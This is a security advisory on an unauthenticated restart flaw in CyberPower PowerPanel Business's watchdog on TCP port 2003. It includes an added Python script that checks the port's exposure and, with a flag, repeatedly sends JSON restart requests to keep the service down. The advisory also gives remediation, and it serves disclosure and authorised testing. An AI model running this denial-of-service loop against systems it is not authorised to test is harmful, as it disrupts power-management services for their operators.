CyberPower PowerPanel Business Denial-of-Service Vulnerability via Unauthenticated Restart of ppbd.exe
Vulnerability
A denial-of-service vulnerability exists in CyberPower PowerPanel Business (PPB) versions up to and including 4.11.0. The PowerPanel Business Service Watchdog listens on TCP port 2003 and accepts restart requests without any authentication, so a remote attacker who can reach that port can force the ppbd.exe process to restart as often as they like.
Impact
Each request causes the watchdog to restart ppbd.exe. An attacker who sends requests continuously keeps the process cycling through shutdown and startup, so it is never available to legitimate clients: a denial-of-service condition. Nothing beyond network reachability of TCP port 2003 is required; no credentials or prior access are needed.
Reproduction
The vulnerability can be reproduced by connecting to TCP port 2003 on the target host and sending a JSON payload whose request type is 2 and whose request string indicates that the application should be restarted. Any network utility that can write a crafted JSON body to a raw TCP socket is sufficient; repeating the request at short intervals keeps the process restarting.
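The following script is an added example, not CyberPower's code and not part of the original advisory. It checks whether the watchdog port is reachable from the machine running it (the exposure that makes this issue remotely exploitable) and, only when explicitly asked, sends the restart request described above. The advisory specifies the transport (TCP 2003), the encoding (JSON), the request type (2) and that the request string asks for a restart, but not the field names; the key names `type` and `request` and the string `restart` are assumptions and must be confirmed against a capture of the genuine client before this is relied on as a reproduction.

```python
"""Exposure check and restart-request sender for the PowerPanel Business
Service Watchdog on TCP/2003.

Added example, not CyberPower's code. The JSON field names ("type",
"request") and the request string ("restart") are ASSUMPTIONS; the
advisory only states that the request type is 2 and that the request
string indicates a restart. Verify them against real traffic first.
"""
import argparse
import json
import socket
import time

WATCHDOG_PORT = 2003
RESTART_TYPE = 2  # request type the advisory associates with a restart


def build_restart_request(request_str: str = "restart") -> bytes:
    """Serialise the restart request as compact JSON.

    Field names are assumed (see module docstring), only the type value
    and the restart semantics come from the advisory.
    """
    msg = {"type": RESTART_TYPE, "request": request_str}
    return json.dumps(msg, separators=(",", ":")).encode("utf-8")


def watchdog_reachable(host: str, port: int = WATCHDOG_PORT,
                       timeout: float = 3.0) -> bool:
    """True if a TCP handshake to host:port completes.

    A watchdog that answers from an untrusted network segment is exactly
    the exposure this advisory describes; nothing is sent here.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_restart(host: str, port: int = WATCHDOG_PORT,
                 timeout: float = 3.0) -> bytes:
    """Send one restart request and return whatever the watchdog answers.

    The reply may be empty: the service may act on the request and close
    the connection without responding.
    """
    payload = build_restart_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.settimeout(timeout)
        try:
            return s.recv(4096)
        except OSError:  # timeout or reset while the process goes down
            return b""


def main() -> None:
    ap = argparse.ArgumentParser(
        description="Check exposure of the PPB watchdog and optionally send "
                    "restart requests (authorised testing only).")
    ap.add_argument("host")
    ap.add_argument("--port", type=int, default=WATCHDOG_PORT)
    ap.add_argument("--send", type=int, default=0, metavar="N",
                    help="send N restart requests (default 0: reachability check only)")
    ap.add_argument("--interval", type=float, default=1.0,
                    help="seconds between requests when --send is used")
    args = ap.parse_args()

    if not watchdog_reachable(args.host, args.port):
        print(f"{args.host}:{args.port} not reachable; watchdog not exposed from here")
        return
    print(f"{args.host}:{args.port} accepts connections (unauthenticated watchdog exposed)")

    # Repeating the request is what turns a single restart into a denial of service.
    for i in range(args.send):
        reply = send_restart(args.host, args.port)
        print(f"restart request {i + 1}/{args.send} sent, reply: {reply!r}")
        time.sleep(args.interval)


if __name__ == "__main__":
    main()
```

Run it with only a host argument to confirm whether port 2003 is reachable from the vantage point you care about (for example a user VLAN that should have no path to the UPS management host); add `--send N` only against a system you are authorised to test, since every request restarts the service.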
Remediation
Users are advised to upgrade to CyberPower PowerPanel Business version 4.11.3 or later. Until the upgrade is applied, restrict network access to TCP port 2003 on the PPB host to trusted management hosts only, since any host that can reach the port can trigger the restart.
